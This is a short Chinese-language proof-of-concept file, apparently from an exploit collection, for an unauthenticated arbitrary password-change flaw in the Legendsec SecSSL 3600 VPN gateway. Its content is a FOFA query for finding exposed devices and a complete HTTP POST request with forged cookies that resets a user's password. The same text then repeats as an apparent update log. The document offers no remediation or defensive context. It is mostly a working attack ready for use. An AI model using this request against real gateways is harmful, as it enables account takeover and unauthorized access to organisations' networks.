POC00/某神SecSSL3600安全接入网关系统任意密码修改漏洞.md

## 某神SecSSL3600安全接入网关系统任意密码修改漏洞

网神 SecSSL 3600安全接入网关系统 存在未授权访问漏洞，攻击者通过漏洞可以获取用户列表，并修改用户账号密码

## fofa

```
app="安全接入网关SecSSLVPN"
```

## poc

```yaml
POST /changepass.php?type=2 HTTP/1.1
host:
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@
```

![image-20240714234418619](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407142344689.png)
7.17更新漏洞 2024-07-17 13:07:11 +08:00			`## 某神SecSSL3600安全接入网关系统任意密码修改漏洞`

			`网神 SecSSL 3600安全接入网关系统存在未授权访问漏洞，攻击者通过漏洞可以获取用户列表，并修改用户账号密码`

			`## fofa`

			```
			`app="安全接入网关SecSSLVPN"`
			```

			`## poc`

			```yaml
			`POST /changepass.php?type=2 HTTP/1.1`
			`host:`
			`Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}`

			`old_pass=&password=Test123!@&repassword=Test123!@`
			```

			`![image-20240714234418619](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407142344689.png)`